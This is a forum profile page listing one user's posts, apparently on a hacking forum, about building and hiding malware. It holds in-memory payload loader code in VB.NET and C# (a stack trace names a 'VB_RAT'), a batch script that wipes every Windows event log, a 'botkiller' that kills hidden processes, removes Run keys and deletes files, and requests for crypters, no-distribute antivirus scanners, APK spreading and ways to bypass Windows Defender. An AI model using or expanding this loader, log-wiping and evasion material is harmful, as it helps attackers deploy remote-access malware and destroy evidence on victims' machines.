About 1stetcgoldmedal

  • Rank
    Rank №2
  1. Can anyone recommend a powerful .NET obfuscator?

    With Detect It Easy and similar tools, I've found a program where the obfuscation tool used can't be identified; no protector is detected. In fact, when I decompiled it and looked at the code, I found that it was severely obfuscated. Most function names were replaced with characters such as \u0A5D\uFFFD\uE09C \u0A5D\uFFFD\uE09C, and there were severe errors when modifying the class. Can someone actually provide me with an open source link to such an obfuscator? Or information. Personally, I think it's good to make it yourself.
  2. Thanks. Can I hear about the static analysis scanner? http://scanlabs.net https://antiscan.me/ https://spyralscanner.net/ https://metadefender.opswat.com/#!/ https://cyberscan.org/index.php https://avcheck.net/ Is there anything you would recommend or avoid?
  3. Could you please tell me an efficient scanner which is accurate & not overpriced? I need an accurate scanner. I'd like to test with my crypter & malware.
  4. Bug on assembly load? Or problem Question

    VB.NET

        Sub Main()
            Try
                Assembly.Load(Convert.FromBase64String("")).EntryPoint.Invoke(Nothing, Nothing)
                End
            Catch
            End Try
        End Sub

    C#

        private static void Main()
        {
            try
            {
                Assembly.Load(Convert.FromBase64String("")).EntryPoint.Invoke(null, null);
            }
            catch { }
        }

    Link of native resource & include file exe : https://www.sendspace.com/file/fzlz29

    This is example code. You can use base64 encoding or IO.File.ReadAllBytes or something. This is the same code. However, this code doesn't load the attached file. It doesn't work only in VB.NET. It works in C#. The exe file is from the compiled VB.NET & C# code. Add a native resource to that file: type 23, name 129, language 1031. It must be added with these settings. This ensures that the bin file loads properly. *only in C#.* I'm curious about the reason for this.

    What I want to load is an include file. The include file reads its own native resource. Then it decrypts it with a password and runs it. You can see the msgbox. * Adding a resource to an include file also works. * My idea is to load the include file with 1.exe and run it. In fact, native resource is added to 1.exe and include file is Run that byte array as a new thread in memory.

    Long Description & Immature English Skills. Thank you for reading the long article.
  5. How to Extract Native Resource

    How to extract a native resource through WinAPI or another way in VB.NET? I tried using reshacker or reseditor, but I noticed that the hash values are different in extracting & adding internal resource values. I don't know the exact reason, but I hope you can tell me how to add & delete & extract & edit native resources in .NET.

        Try
            Dim hResInfo As IntPtr = FindResourceEx(New IntPtr(0), New IntPtr(23), New IntPtr(129), 1031)
            Dim num As UInteger = SizeofResource(New IntPtr(0), hResInfo)
            Dim source As IntPtr = LockResource(LoadResource(New IntPtr(0), hResInfo))
            Dim Data = New Byte(num) {}
            Marshal.Copy(source, Data, 0, Int(num))
            IO.File.WriteAllBytes("DECRPYTED", DecryptBytes(Data))
            End
        Catch ex As Exception
            MsgBox(ex.ToString)
        End Try

    What's my problem? What I'm trying to do is to compile the native resource of the exe file compiled with C# to VB.NET and add the native resource from C# to the VB.NET exe. Sorry for my bad English.
  6. Delete All EventLog batch script

        @echo off
        FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
        IF (%adminTest%)==(Access) goto noAdmin
        for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
        echo.
        echo All Event Logs have been cleared!
        goto theEnd
        :do_clear
        echo clearing %1
        wevtutil.exe cl %1
        goto :eof
        :noAdmin
        echo Current user permissions to execute this .BAT file are inadequate.
        echo This .BAT file must be run with administrative privileges.
        echo Exit now, right click on this .BAT file, and select "Run as administrator".
        pause >nul
        :theEnd

    Need permission for execute. Tested on Win 10, successfully working.
  7. C# Botkiller

        using System;
        using System.IO;
        using System.Diagnostics;
        using System.Runtime.InteropServices;
        using Microsoft.Win32;
        using System.Security.Principal;

        // │ Author : NYAN CAT
        // │ Name : Bot Killer v0.2.6
        // │ Contact : https://github.com/NYAN-x-CAT
        // This program Is distributed for educational purposes only.

        namespace BotKiller
        {
            //Must run 64bit
            class Program
            {
                static void Main()
                {
                    RunBotKiller();
                }

                public static void RunBotKiller()
                {
                    foreach (Process p in Process.GetProcesses())
                    {
                        try
                        {
                            if (Inspection(p.MainModule.FileName))
                                if (!IsWindowVisible(p.MainWindowHandle))
                                {
                                    RemoveFile(p);
                                }
                        }
                        catch (Exception ex)
                        {
                            Debug.WriteLine("RunBotKiller: " + ex.Message);
                        }
                    }
                }

                private static void RemoveFile(Process process)
                {
                    try
                    {
                        string processName = process.MainModule.FileName;
                        process.Kill();
                        RegistryDelete(@"Software\Microsoft\Windows\CurrentVersion\Run", processName);
                        RegistryDelete(@"Software\Microsoft\Windows\CurrentVersion\RunOnce", processName);
                        System.Threading.Thread.Sleep(100);
                        File.Delete(processName);
                    }
                    catch (Exception ex)
                    {
                        Debug.WriteLine("RemoveFile: " + ex.Message);
                    }
                }

                private static bool Inspection(string threat)
                {
                    if (threat == Process.GetCurrentProcess().MainModule.FileName) return false;
                    if (threat.StartsWith(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData))) return true;
                    if (threat.StartsWith(Environment.GetFolderPath(Environment.SpecialFolder.UserProfile))) return true;
                    if (threat.Contains("wscript.exe")) return true;
                    if (threat.StartsWith(Path.Combine(Path.GetPathRoot(Environment.SystemDirectory), "Windows\\Microsoft.NET"))) return true;
                    return false;
                }

                // Unused overload; it calls itself, so it would recurse endlessly if invoked with a string.
                private static bool IsWindowVisible(string lHandle)
                {
                    return IsWindowVisible(lHandle);
                }

                private static void RegistryDelete(string regPath, string payload)
                {
                    try
                    {
                        using (RegistryKey key = Registry.CurrentUser.OpenSubKey(regPath, true))
                        {
                            if (key != null)
                                foreach (string valueOfName in key.GetValueNames())
                                {
                                    if (key.GetValue(valueOfName).ToString().Equals(payload))
                                        key.DeleteValue(valueOfName);
                                }
                        }
                        if (new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator))
                        {
                            using (RegistryKey key = Registry.LocalMachine.OpenSubKey(regPath, true))
                            {
                                if (key != null)
                                    foreach (string valueOfName in key.GetValueNames())
                                    {
                                        if (key.GetValue(valueOfName).ToString().Equals(payload))
                                            key.DeleteValue(valueOfName);
                                    }
                            }
                        }
                    }
                    catch (Exception ex)
                    {
                        Debug.WriteLine("RegistryDelete: " + ex.Message);
                    }
                }

                [DllImport("user32.dll")]
                [return: MarshalAs(UnmanagedType.Bool)]
                static extern bool IsWindowVisible(IntPtr hWnd);
            }
        }

    Remove windows invisible program from startup program & remove file & exit
  8. Can anyone tell me about APK Spreading?

    Does it need crypting? Or changing the application information? Sorry for my inexperienced English.
  9. So, do I use Application.SetCompatibleTextRenderingDefault(false) in Form_Load, or where? Can you teach me? ..
  10. "Exception has been thrown by the target of an invocation"

    Code:

        Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
            Reflection.Assembly.Load(My.Resources.install).EntryPoint.Invoke(Nothing, New Object() {New String() {Environment.CurrentDirectory}})
            End
        End Sub

    Use application framework & start form: form1. Why does this error occur? This error works well when run from the console, not the form. I wonder why this error is happening. Also, when I use "try - catch" to do a msgbox (ex.tostring), this is the message:

        System.Reflection.TargetInvocationException: The invocation target has thrown an exception. ---> System.InvalidOperationException: SetCompatibleTextRenderingDefault should be called before the first IWin32Window object is created in the application.
           location: System.Windows.Forms.Application.SetCompatibleTextRenderingDefault (Boolean defaultValue)
           Location: VB_RAT.My.MyApplication.Main (String [] Args)
           --- End of internal exception stack trace ---
           location: System.RuntimeMethodHandle.InvokeMethod (Object target, Object [] arguments, Signature sig, Boolean constructor)
           location: System.Reflection.RuntimeMethodInfo.UnsafeInvokeInternal (Object obj, Object [] parameters, Object [] arguments)
           location: System.Reflection.RuntimeMethodInfo.Invoke (Object obj, BindingFlags invokeAttr, Binder binder, Object [] parameters, CultureInfo culture)
           location: System.Reflection.MethodBase.Invoke (Object obj, Object [] parameters)
           location: T.Form1.Form1_Load (Object sender, EventArgs e)

    Can someone solve my curiosity? Sorry for bad English ...
  11. VB.NET Licence system offline with skgl

    Link : https://www.sendspace.com/file/4z65nx Pass : dedik.cc This file contains only source code. Executable not included. You can also create & remove additional options called "Features".
  12. RAT's

    Quasar = .NET, Remcos C good rat
  13. How to bypass windows defender?

    need to change native ? C / C / Delphi ? For example XOR
  14. How to bypass windows defender?

    I'm trying to bypass Windows Defender at runtime. I'm using VB.NET and: LoadPE = Assembly.Load, RunPE = Public RunPE, Payload Encryption Algorithm = AES, Using GZIP Compression. LoadPE is good but is it Detected all (maybe detect "decrypted payload" at runtime). I can Bypass scantime but "Exclude runtime". Anyone please teach me method for bypass windows defender? I know powershell method but it is not very useful. Sorry for my bad English :( ...